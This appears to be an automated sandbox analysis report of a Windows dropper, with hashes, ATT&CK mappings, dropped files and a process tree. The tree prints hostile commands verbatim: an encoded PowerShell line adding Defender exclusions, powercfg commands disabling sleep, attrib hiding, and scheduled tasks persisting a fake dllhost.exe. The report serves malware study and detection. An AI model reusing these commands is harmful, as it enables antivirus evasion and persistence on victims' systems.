557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431

Analysis

max time kernel
53s
max time network
181s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
15-09-2022 10:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431.exe
Size

2.5MB
MD5

91b94209befe0f949c57b675366286a9
SHA1

6f8690b660841d7ea7f90e2d6d3c408c31bce46d
SHA256

557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431
SHA512

d10e483f89fcfcf46a98b345b747efddac96daae9639db4e36fd66c717278ec632d523a8005441021fef1006be1fac913d87139705886a85e222d6fa68b3614e
SSDEEP

49152:xzwRbvP+eiKK9c4sZ1Jf+O4ZqddUUaaY38XAx4X8qWgMSIf5S+RJQNeiWW2Y:xzwRyeK9c4s/J2O4WeUaT88qZIfxJUek

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
4344	7z.exe
4056	7z.exe
3396	7z.exe
1292	7z.exe
2444	7z.exe
3628	7z.exe
4368	7z.exe
4376	7z.exe
4960	7z.exe
3576	vasco.exe

Loads dropped DLL 9 IoCs

pid	Process
4344	7z.exe
4056	7z.exe
3396	7z.exe
1292	7z.exe
2444	7z.exe
3628	7z.exe
4368	7z.exe
4376	7z.exe
4960	7z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3376	schtasks.exe
4280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3576	vasco.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3576	vasco.exe
3576	vasco.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeRestorePrivilege	4344	7z.exe
Token: 35	4344	7z.exe
Token: SeSecurityPrivilege	4344	7z.exe
Token: SeSecurityPrivilege	4344	7z.exe
Token: SeRestorePrivilege	4056	7z.exe
Token: 35	4056	7z.exe
Token: SeSecurityPrivilege	4056	7z.exe
Token: SeSecurityPrivilege	4056	7z.exe
Token: SeRestorePrivilege	3396	7z.exe
Token: 35	3396	7z.exe
Token: SeSecurityPrivilege	3396	7z.exe
Token: SeSecurityPrivilege	3396	7z.exe
Token: SeRestorePrivilege	1292	7z.exe
Token: 35	1292	7z.exe
Token: SeSecurityPrivilege	1292	7z.exe
Token: SeSecurityPrivilege	1292	7z.exe
Token: SeRestorePrivilege	2444	7z.exe
Token: 35	2444	7z.exe
Token: SeSecurityPrivilege	2444	7z.exe
Token: SeSecurityPrivilege	2444	7z.exe
Token: SeRestorePrivilege	3628	7z.exe
Token: 35	3628	7z.exe
Token: SeSecurityPrivilege	3628	7z.exe
Token: SeSecurityPrivilege	3628	7z.exe
Token: SeRestorePrivilege	4368	7z.exe
Token: 35	4368	7z.exe
Token: SeSecurityPrivilege	4368	7z.exe
Token: SeSecurityPrivilege	4368	7z.exe
Token: SeRestorePrivilege	4376	7z.exe
Token: 35	4376	7z.exe
Token: SeSecurityPrivilege	4376	7z.exe
Token: SeSecurityPrivilege	4376	7z.exe
Token: SeRestorePrivilege	4960	7z.exe
Token: 35	4960	7z.exe
Token: SeSecurityPrivilege	4960	7z.exe
Token: SeSecurityPrivilege	4960	7z.exe
Token: SeDebugPrivilege	3576	vasco.exe
Token: SeDebugPrivilege	4416	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 4888	3064	557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431.exe	67
PID 3064 wrote to memory of 4888	3064	557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431.exe	67
PID 4888 wrote to memory of 4260	4888	cmd.exe	79
PID 4888 wrote to memory of 4260	4888	cmd.exe	79
PID 4888 wrote to memory of 4344	4888	cmd.exe	68
PID 4888 wrote to memory of 4344	4888	cmd.exe	68
PID 4888 wrote to memory of 4056	4888	cmd.exe	78
PID 4888 wrote to memory of 4056	4888	cmd.exe	78
PID 4888 wrote to memory of 3396	4888	cmd.exe	77
PID 4888 wrote to memory of 3396	4888	cmd.exe	77
PID 4888 wrote to memory of 1292	4888	cmd.exe	76
PID 4888 wrote to memory of 1292	4888	cmd.exe	76
PID 4888 wrote to memory of 2444	4888	cmd.exe	75
PID 4888 wrote to memory of 2444	4888	cmd.exe	75
PID 4888 wrote to memory of 3628	4888	cmd.exe	74
PID 4888 wrote to memory of 3628	4888	cmd.exe	74
PID 4888 wrote to memory of 4368	4888	cmd.exe	73
PID 4888 wrote to memory of 4368	4888	cmd.exe	73
PID 4888 wrote to memory of 4376	4888	cmd.exe	72
PID 4888 wrote to memory of 4376	4888	cmd.exe	72
PID 4888 wrote to memory of 4960	4888	cmd.exe	71
PID 4888 wrote to memory of 4960	4888	cmd.exe	71
PID 4888 wrote to memory of 2308	4888	cmd.exe	70
PID 4888 wrote to memory of 2308	4888	cmd.exe	70
PID 4888 wrote to memory of 3576	4888	cmd.exe	69
PID 4888 wrote to memory of 3576	4888	cmd.exe	69
PID 4888 wrote to memory of 3576	4888	cmd.exe	69
PID 3576 wrote to memory of 3040	3576	vasco.exe	83
PID 3576 wrote to memory of 3040	3576	vasco.exe	83
PID 3576 wrote to memory of 3040	3576	vasco.exe	83
PID 3040 wrote to memory of 4416	3040	cmd.exe	82
PID 3040 wrote to memory of 4416	3040	cmd.exe	82
PID 3040 wrote to memory of 4416	3040	cmd.exe	82
PID 3576 wrote to memory of 3504	3576	vasco.exe	89
PID 3576 wrote to memory of 3504	3576	vasco.exe	89
PID 3576 wrote to memory of 3504	3576	vasco.exe	89
PID 3576 wrote to memory of 4768	3576	vasco.exe	84
PID 3576 wrote to memory of 4768	3576	vasco.exe	84
PID 3576 wrote to memory of 4768	3576	vasco.exe	84
PID 3504 wrote to memory of 3376	3504	cmd.exe	86
PID 3504 wrote to memory of 3376	3504	cmd.exe	86
PID 3504 wrote to memory of 3376	3504	cmd.exe	86
PID 4768 wrote to memory of 4280	4768	cmd.exe	87
PID 4768 wrote to memory of 4280	4768	cmd.exe	87
PID 4768 wrote to memory of 4280	4768	cmd.exe	87

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2308	attrib.exe

C:\Users\Admin\AppData\Local\Temp\557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431.exe
"C:\Users\Admin\AppData\Local\Temp\557124f28faf47b5cd571078a01fa81d8c83599202fccd3d37b8d9baa393f431.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4888
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p702199221062412706458326763 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4344
- - C:\Users\Admin\AppData\Local\Temp\main\vasco.exe
    "vasco.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAHAARABSAEwAMQBoAG0AdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAGwAUgBmAG0AagBKAHgARQBWACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADkAQwBmADcARQBOAEwARwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3040
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3619" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4768
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3619" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4280
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3504
- - C:\Windows\system32\attrib.exe
    attrib +H "vasco.exe"
    3⤵
    - Views/modifies file attributes
    PID:2308
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4376
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_3.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4368
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_4.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3628
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_5.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2444
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_6.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1292
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_7.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3396
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_8.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4056
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:4260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHAARABSAEwAMQBoAG0AdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAGwAUgBmAG0AagBKAHgARQBWACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADkAQwBmADcARQBOAEwARwAjAD4A"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1⤵
- Creates scheduled task(s)
PID:3376

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.1MB

MD5
46442170efa9f4b1c3f0215572441986

SHA1
afabb017fd5cbdb19d843d13d3e75c294f6a1f09

SHA256
e7debafb51bdf15d3ebb6c20f259e3766baa3bde8294d6ab1fd910173a2d26a0

SHA512
5bcda7c5150f57c3c5fc9c32d0b42b019ba298170a57197b05ffb550deb1cbc3b7b3380e6ebab18a4c43ca4cec25fc3f7695d3452b0ca932b79a07cb1562ada7

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
9KB

MD5
2a807f7a4f37b263ac807932b6f40958

SHA1
4b79d6ca1889c0e0b1018e38eecadf71a66c920d

SHA256
23aa346ad9c92d44debe3991df334020c8a85b6db6249a2c64237a90e366ef6b

SHA512
d60a90795d8a00cb5db69b2fa75aa627fef94cf312e0dfb359057a83360d11a7700443988b44353a673fd816391a05173be6ae38c47a54d3b40eb30440b8912f

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
9KB

MD5
a762cf28d7e318be1e2b5d6f42a188e6

SHA1
6998ab14709a5bf7e1755a4d8c26effe8cfdc8da

SHA256
279b9f15a86a400afb515dce421898f95cb03ce0ea09d982b3a9e2f132d77fbe

SHA512
dd6e32191343132a03d7e31cd98bfce335efbd46654ac9cd2b64cd68a12611b7453846568e5b1fdd3ea396478c9996836bf78df689df9d3cf591a87a30531fd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

Filesize
9KB

MD5
0c5409b6d33e51e3f0837c38f670cc53

SHA1
edd796abc70c832fde396c9247a1fc941c26e645

SHA256
1b012ca72d9408c7229b03e4b2df8c7336d663a956e3206a3c647a918b05fc22

SHA512
4b0e7b6579d94b690f024c0c47efd23b5373349c8b9795895f468dba33aeffbe204a65a00e2419cc86bcd1a24ba278a6c0eb0e592da859a358805f46db2610cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

Filesize
9KB

MD5
7f74bf320cade73ccd9f6782821e8a3a

SHA1
871420c174fa1d889404b2119cfbe12d06c8fe44

SHA256
18da0bc35207f4234e32b719a1ef15067f9406879379891265434184869322ac

SHA512
b253b03f04d574da7b3a5cda41743b983626786ec5bcaa2f9cd96c9bf4552e823cf5708ad57d5a49d25ed759c5932c5c99404a1913e71c190ce397aeafab6a2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

Filesize
10KB

MD5
a220b1f0f838437315e14519d26c97b3

SHA1
f574fc415a16cf9ce8d4022119354118235d2e10

SHA256
9f0895c4797b7596e44c6ffbbe3e07f4eee9ea211f304f6d9fb66a9f162fcbd8

SHA512
94d0313e6e01ee435f8d0e7d9dde5d20d327c45e9d2a10f40361d3b48a33ddc74e58dfda8cb76724207dd0d5e36bbd23354fc2a8e41e982c3491edb6d111f00b

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

Filesize
10KB

MD5
39840bd62b0da652f00dcc094a7a1793

SHA1
3ea7019b09ef72992081e53aafdcf18a28764786

SHA256
d339a9bf8883d723753e0c351895d3840b6a19f6f03b7c926dc318d833f161be

SHA512
87928b45d7e048450803c4150fe2e7f5702da195111dee9dec09dfe0a097b939a9cf5d47c99191cdb18a1a5d348d586470ef39daec6fb3b697ea9264aaf09bcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

Filesize
10KB

MD5
6cbf067a763de78502ec2899ddeed1c5

SHA1
3f7cf5e74c28c2bd11d66ce65ab1c1df06da538d

SHA256
6bbb911d1c98775df768d50314efaae4ff13c3370cd3bf0814c2f2c59ba22b65

SHA512
f2e7d767ee805bb0c8047e8208938123868720d27cf3b467217efa4b8f3a91e18ac071671e32815de53d9a97c3070461a42b76ff3615cc181671e01b36c0c803

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

Filesize
1.5MB

MD5
3b5d92ebdb07b9c8b517c59aafff0c32

SHA1
e47bf4165ddac0ef5792b0dfa567553a9e47c266

SHA256
3b7f2c294511c7b024b93a90f4c71ed60349fb41c262f09cac58c4f9338a2e2f

SHA512
e939b8af40d5635b3b0742ac6aedcfab88719bdeb4dd3466e05225f3ba476a3225f86c20cc3236cd9dee28d3d1dd4e984a62062066459158fa67dc1d6eedd128

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\vasco.exe

Filesize
21KB

MD5
960d82d9e6fb4ca8d79de0466983ac5d

SHA1
ec9d0a7b281fae548d3a162ddf00f9b7a47a0545

SHA256
ff2f3973bcbe73d9897d5f4a6e275cfa71b7ed2fba300674f2770c6ab6c2f88c

SHA512
4cde37a15dcdccc0a2625c4b8d3ffa9c8acafbe51846a1f6347a27212703d5479e8f03fc5d44546ea960d1e6a0cd8139c825255748d3b8d2987e6d8165efe2c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
1.5MB

MD5
c2773b498420cfb9ca34eb266d7ec6e5

SHA1
6906daa8363e68fc8542e3c75b139df319a238c9

SHA256
237607c9b3e4f480a96b7a2525c6788c114d06f59d7737e2bc532b752e96e9b9

SHA512
629149900ecd48013f1a6d9ab537f360ef48116151cf5ff47c80e4bb6953c9a5bb6c8202f54ce88a0a3b776ce6fef42e49acddf3b61176731aeb277bb36763c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
453B

MD5
d988910d158b9b34b9af56b56f0f72ae

SHA1
e9a3a0b12ac1a3d733bbf69aa8b11fa5caf1922d

SHA256
1d6ca409aa12bd7d37fc24671cdb6cf7bfe1c0370f492fdc5a10c2bed4153ef8

SHA512
bc2327c956f204fcbe00a9481f6a770f1b2ca05ecc3e2990ead2582dc98b36bffaa7dcfb5633ff5b4b649472212ba6b1313716468213404cbe9e98ddd2b07914

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\vasco.exe

Filesize
21KB

MD5
960d82d9e6fb4ca8d79de0466983ac5d

SHA1
ec9d0a7b281fae548d3a162ddf00f9b7a47a0545

SHA256
ff2f3973bcbe73d9897d5f4a6e275cfa71b7ed2fba300674f2770c6ab6c2f88c

SHA512
4cde37a15dcdccc0a2625c4b8d3ffa9c8acafbe51846a1f6347a27212703d5479e8f03fc5d44546ea960d1e6a0cd8139c825255748d3b8d2987e6d8165efe2c5

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
memory/3064-149-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-118-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-154-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-155-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-157-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-158-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-156-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-159-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-160-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-117-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-152-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-151-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-150-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-116-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
1.6MB

Download
memory/3064-148-0x0000000076FE0000-0x000000007716E000-memory.dmp

Filesize
